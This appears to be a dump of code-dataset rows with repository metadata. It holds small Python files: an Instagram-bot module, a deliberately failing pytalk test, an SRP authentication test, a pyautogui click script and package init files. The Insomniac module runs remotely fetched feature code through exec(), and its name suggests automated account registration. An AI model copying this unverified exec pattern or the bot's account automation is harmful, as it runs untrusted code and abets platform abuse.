2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
from insomniac import activation_controller

# Executes dynamically fetched feature code via exec().
# NOTE(review): the code string comes from activation_controller, not user
# input here, but verify the activation payload source is trusted — exec()
# runs it with full privileges.
exec(activation_controller.get_extra_feature("action_register_accounts"))
| 29.75
| 73
| 0.890756
| 14
| 119
| 7.142857
| 0.857143
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05042
| 119
| 3
| 74
| 39.666667
| 0.884956
| 0
| 0
| 0
| 0
| 0
| 0.201681
| 0.201681
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
24a87274ca8edb259e3599922d6f2f91ff2cbfb3
| 83
|
py
|
Python
|
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
import math

# Registers a pytalk 'factorial' method whose body deliberately divides by
# zero (n / 0) — per the file name, this presumably tests pytalk's error
# reporting; confirm before "fixing".
@pytalk_method('factorial')
def fact(n):
    return math.factorial(n / 0)
| 16.6
| 29
| 0.73494
| 13
| 83
| 4.615385
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.120482
| 83
| 5
| 29
| 16.6
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
24b9349695d31b6b06e6ad0a4cb644dfe9939a58
| 6,234
|
py
|
Python
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 462
|
2017-10-14T16:58:36.000Z
|
2022-03-24T01:40:23.000Z
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 371
|
2017-11-28T14:00:02.000Z
|
2022-03-31T21:44:07.000Z
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 129
|
2017-11-23T20:50:28.000Z
|
2022-03-17T01:26:53.000Z
|
"""Tests for pyhap.hsrp."""
# pylint: disable=line-too-long, pointless-string-statement
import hashlib
from pyhap.hsrp import Server
from pyhap.params import get_srp_context
from pyhap.util import long_to_bytes
DUMMY_A = b"Ve\xce\xd4\x90LExKD\x9d7\x16\\@\xb6\xb8\x9f\x01\x1a]\x86\xa4\x1c"
" \x13\xaa\xc0\x17=\x1f\xafPx\xea/\x01Q\xc8hw\x06\x03\xc8O\x89|\x8d4\xa8\x85"
"\xd2\xfb:\x0e\xb6PT2V\xb2\xa9\xca\x0bL\x97\r\xee\x88\xbc\xef\x8d\xa6|\xeb \xdc"
"\x80.\x92\xe0\xe5s\xf5\xf2;\x89LN\\^\x8c\xd1\x00\x99U]]/^\xe9\x1b\xe2\xf3\x1a|"
"\xc6\x85Q\x95T`b\x8e\x04\xc2\x99\xdd\xdfp\x98\x85\x13\xe5\xaf\xdf\xe0Tm\xa3t\xfe"
"\xc1_V\x04\xab\xb1\x96\xa8\x9cw\xa40\x95\x8d\x9f|\xf7.\x90\xd2{L\xcc*\xcb\xdde"
"\x81\x14\x14\xc97\xe7\xa0177\x1b\xe0\xb0\x19\x0f\xf1\x1e;\xc4\xc9\x07\x05zN\xb3"
"!y\xf2\x9e\xa4N\xbeswxx\x13\x82\x18\xccU\xb4\xec\x7f{\x8eo\x86\x0b\xa6\xff\x9b"
"\xbcY(0\x16\xba$\x9d\xb9\x8d}\xe5f\x0c)\\\x8b\\\xef\xfd\x0coEg\x13\x13\xa2q\xb9"
"\xe5\x8a\xfd\x97\x97\xcb\xb1\x15\xd5\xc2\xd7\x07\x91A\xdf\xd7"
def test_srp_basic():
ctx = get_srp_context(3072, hashlib.sha512, 16)
b = 191304991611724068381190663629083136274
s = long_to_bytes(227710976386754876301088769828140156049)
verifier = Server(ctx, b"Pair-Setup", b"123-45-543", s=s, b=b)
verifier.set_A(DUMMY_A)
assert (
verifier.k
== 8891118944006259431156568541843809053371474718154946070525699599564743247786811275097952247025117806925219847643897478119979876683245412022290811230509536
)
assert (
verifier.get_session_key()
== 7776966363435436003301596680621751479448170893927097125414524508260409807602643597201957531811064094375727460485526402929080964822225092649470633176208468
)
assert (
verifier.M
== b"\xafnZ\xef\x8e\x84\xbe\xaa\xe2M}5'\x0c\xb8\xb9\x07\x13\xa3t\xbbfOL\x059\xa3T\xaf\x021\x05\xf7*\xdb]\xa3]\x92\xbc\xa7\x0ed\xc1C\x88W\x0b\xe7n\xe6|\x1e\xb4\xf9pUc\xa2\x8d\x05\xd7\xabI"
)
assert (
verifier.S
== 74327940101639752536537640881643581886247890122995727869092918508085397047960192114187184206420245499227933354038262980545757154896143196917567791395562849790585173129051928488506985432588320936161016609993624725221069849383124728580710793131421162926844621384309691065416908669855286020750380619018007734494245389837285359061649585082978114606737696983003789452193299203880220013003551748645087934186574940836315605161763958706985646740794424371115818479937015467439653789667600114913036877616558029128521276071759153575011083182650027094873442901697309464533625147028860476977419766721379872518101123122550406587162809198793634217353529574423908555799363233330194347012490634061830786590780000201696990820985363093141614397601285773980430681705777477946555312165250133963931282621724675380164859592461132141730419315498467050491890312826221069184134326282895963295397215898192608240385050625017941322853973472354023693355
)
assert verifier.get_challenge() == (
s,
2149981971605054722971448928513305504744266471818820776094113337432031877014471028912971746321748621185649001880451734094103311676264091997241948096711710461140721738956497494552388614895831596671069609694220554015991913746528757304239759620571367574036184864989138266792823575841594621160010011666017298902208272126405229578664943728094068949021795802799552486045670159066273942547651088762352104942364707580142387716636468281068738042936130578774565386637668610429058884417819388838110075674266297699354845325023954873162742733169560666501210723876454859556564325607870517213063038111644227553599978606540729093082921723443122696487068510228710655880466038292327450357013882323502992655150615829432843408599038481983277372215619348128412279375677793332715557041679298014663382481619951610899087031959653365603032111634191603851554865349816117884573658915813848292512124719015181912892538210471183790840676306564839828444134,
)
assert verifier.b == b
assert (
verifier.v
== 1800954445588585461785592179273284825501707649217210015435034845050179016324355419526711292364866248346582448660643272322280999760562622718989053886869428917425675795172391329924178337579968214001782222575897907780437717763112406095878356902641567396545009429496128133564692965499069074320017151157469160990771527712530637370897276672652870613312504255873634362188551282649472569433062597795005057270622772410668342950279555516133010272639201733492626622809480021268951287298118968011031850511105359580984350020671780470982743318615303989055956125558514263378948829479434245711743458681522240763520911255733079164391662778946744155477806679057949726211652108387739564473209550264487697151825509058193841809273482575660658239177704074882302955007248950743262054925817705066654613816236610736311934089570249355454459951577900707115340781119430461780455828980205046091360390327787803271426555681638302650021637121212829077894589
)
assert (
verifier.N
== 5809605995369958062791915965639201402176612226902900533702900882779736177890990861472094774477339581147373410185646378328043729800750470098210924487866935059164371588168047540943981644516632755067501626434556398193186628990071248660819361205119793693985433297036118232914410171876807536457391277857011849897410207519105333355801121109356897459426271845471397952675959440793493071628394122780510124618488232602464649876850458861245784240929258426287699705312584509625419513463605155428017165714465363094021609290561084025893662561222573202082865797821865270991145082200656978177192827024538990239969175546190770645685893438011714430426409338676314743571154537142031573004276428701433036381801705308659830751190352946025482059931306571004727362479688415574702596946457770284148435989129632853918392117997472632693078113129886487399347796982772784615865232621289656944284216824611318709764535152507354116344703769998514148343807
)
assert verifier.g == 5
assert (
verifier.verify(verifier.M)
== b"\xe1\x00\xcf\xe2\x98\xaf\x1e\x02tb\x0b\xfclKF\xee\x1b\x80\xf6\x90\xb7\x8a\x9f\x133y#>\x8d/\xc1\x88\x93\x8eh\tN\x9b\xda\xc2-\x1a(\xe3\xca\x0bf\xf3\xc4\xca\xc4\xec\xfa/\xec\xb7\x16\x81\xdd%\xc9i\xf9\x90"
)
assert verifier.verify(b"wrong") is None
| 93.044776
| 936
| 0.874398
| 383
| 6,234
| 14.18799
| 0.613577
| 0.02834
| 0.004785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.744052
| 0.056144
| 6,234
| 66
| 937
| 94.454545
| 0.17947
| 0.012833
| 0
| 0.127273
| 0
| 0.218182
| 0.188029
| 0.182986
| 0
| 1
| 0
| 0
| 0.2
| 1
| 0.018182
| false
| 0
| 0.072727
| 0
| 0.090909
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
24ec5f5b67f123b1ab51709306df44fcc5a007e2
| 47
|
py
|
Python
|
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | 1
|
2022-02-19T22:01:03.000Z
|
2022-02-19T22:01:03.000Z
|
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | null | null | null |
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | 1
|
2022-02-19T22:01:07.000Z
|
2022-02-19T22:01:07.000Z
|
import pyautogui as pag
pag.click('acpt2.png')
| 15.666667
| 23
| 0.765957
| 8
| 47
| 4.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.106383
| 47
| 3
| 24
| 15.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70000fb558bd148478010379ad8aa43e16ebe478
| 31
|
py
|
Python
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from p1 import m1
m1()
#<ref>
| 6.2
| 17
| 0.612903
| 6
| 31
| 3.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0.225806
| 31
| 4
| 18
| 7.75
| 0.666667
| 0.16129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70953de039cf2a60952ffdd71cfb923ff3f27d14
| 115
|
py
|
Python
|
api/main.py
|
Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
api/main.py
|
Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
api/main.py
|
Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
# Importar bibliotecas
from src.server.instance import server
from src.controllers.previsao import *
server.run()
| 19.166667
| 38
| 0.808696
| 15
| 115
| 6.2
| 0.666667
| 0.150538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113043
| 115
| 6
| 39
| 19.166667
| 0.911765
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
7097bd8c13f5d06752e5cc1366c59ceb71f51f8b
| 56
|
py
|
Python
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 21
|
2022-03-12T01:42:05.000Z
|
2022-03-31T17:01:45.000Z
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 2
|
2022-03-29T10:50:33.000Z
|
2022-03-30T10:40:53.000Z
|
depth/models/utils/hooks/__init__.py
|
zhyever/Monocular-Depth-Estimation-Toolbox
|
c591b9711321450387ffa7322ec1db9a340347c2
|
[
"Apache-2.0"
] | 3
|
2022-03-26T11:52:44.000Z
|
2022-03-30T21:24:16.000Z
|
from .tensorboard_hook import TensorboardImageLoggerHook
| 56
| 56
| 0.928571
| 5
| 56
| 10.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053571
| 56
| 1
| 56
| 56
| 0.962264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
709f50e204ec8910cedb0d2de6a8babf99f30e00
| 212
|
py
|
Python
|
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | null | null | null |
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | 3
|
2020-12-21T22:28:13.000Z
|
2021-09-15T16:06:07.000Z
|
saturn_client/__init__.py
|
saturncloud/saturn-client
|
8d2f8ef41f9ef5be9c452fbfc8fcec5fa515a869
|
[
"BSD-3-Clause"
] | 1
|
2021-09-15T02:07:23.000Z
|
2021-09-15T02:07:23.000Z
|
"""
imports added so users do not have to think about submodules
"""
from .core import SaturnConnection # noqa: F401
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
| 21.2
| 60
| 0.768868
| 29
| 212
| 5.344828
| 0.724138
| 0.212903
| 0.232258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016667
| 0.150943
| 212
| 9
| 61
| 23.555556
| 0.844444
| 0.339623
| 0
| 0
| 0
| 0
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70a64ec42beab0d52fac539cfe8ef4951a201fb5
| 147
|
py
|
Python
|
pylammpsmpi/__init__.py
|
srmnitc/pylammpsmpi
|
5d459ce67838731aabd59071430e20f04ad57c5f
|
[
"BSD-3-Clause"
] | 11
|
2020-06-20T15:50:35.000Z
|
2021-12-19T16:37:57.000Z
|
pylammpsmpi/__init__.py
|
jan-janssen/pylammpsmpi
|
4a1326ace148b114754e09b28059a9b778bf47ee
|
[
"BSD-3-Clause"
] | 31
|
2020-03-05T18:58:09.000Z
|
2022-03-07T08:52:30.000Z
|
pylammpsmpi/__init__.py
|
jan-janssen/pylammpsmpi
|
4a1326ace148b114754e09b28059a9b778bf47ee
|
[
"BSD-3-Clause"
] | 4
|
2020-03-05T18:19:30.000Z
|
2021-06-04T04:43:23.000Z
|
from pylammpsmpi.lammps_wrapper import LammpsLibrary
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
| 21
| 52
| 0.836735
| 18
| 147
| 6.333333
| 0.555556
| 0.289474
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 147
| 6
| 53
| 24.5
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
560e1c9ba4a281bfa549f9ad17b94add2c9ff035
| 73
|
py
|
Python
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-07-16T11:56:49.000Z
|
2021-07-16T11:56:49.000Z
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-05-21T07:29:11.000Z
|
2021-05-21T07:29:11.000Z
|
orka_vector_api/views/__init__.py
|
jansule/OrKa-Vector-API
|
3daa4033550d0f9c63ae38cadc982e30f0f04651
|
[
"Apache-2.0"
] | 1
|
2021-04-12T09:06:26.000Z
|
2021-04-12T09:06:26.000Z
|
from .data import data
from .jobs import jobs
from .status import status
| 18.25
| 26
| 0.794521
| 12
| 73
| 4.833333
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164384
| 73
| 3
| 27
| 24.333333
| 0.95082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
564dfb9d32316bcf5b055e004a0bb77b61750a17
| 62
|
py
|
Python
|
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
nupy/__init__.py
|
begeistert/nupy
|
b1026afc21b9a985a3329f1a16006aec8fa4d726
|
[
"MIT"
] | null | null | null |
from .sympy_algebra import *
from .iterative_methods import *
| 20.666667
| 32
| 0.806452
| 8
| 62
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 62
| 2
| 33
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
5666e40a48cfbffa3c0683f6adb0a389a52ba508
| 368
|
py
|
Python
|
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
datagateway_api/src/search_api/session_handler.py
|
MRichards99/datagateway-api
|
2e6133636fed950a16190d2f703f152c73bb5b1b
|
[
"Apache-2.0"
] | null | null | null |
# TODO - can we enforce a singleton pattern on the class?
class SessionHandler:
def __init__(self):
self.client = None
self.session_id = None
def requires_session_id(method):
"""
TODO
"""
pass
"""
@wraps(method)
def wrapper_requires_session(*args, **kwargs):
pass
return wrapper_requires_session
"""
| 17.52381
| 57
| 0.616848
| 42
| 368
| 5.142857
| 0.619048
| 0.208333
| 0.203704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.285326
| 368
| 20
| 58
| 18.4
| 0.821293
| 0.165761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.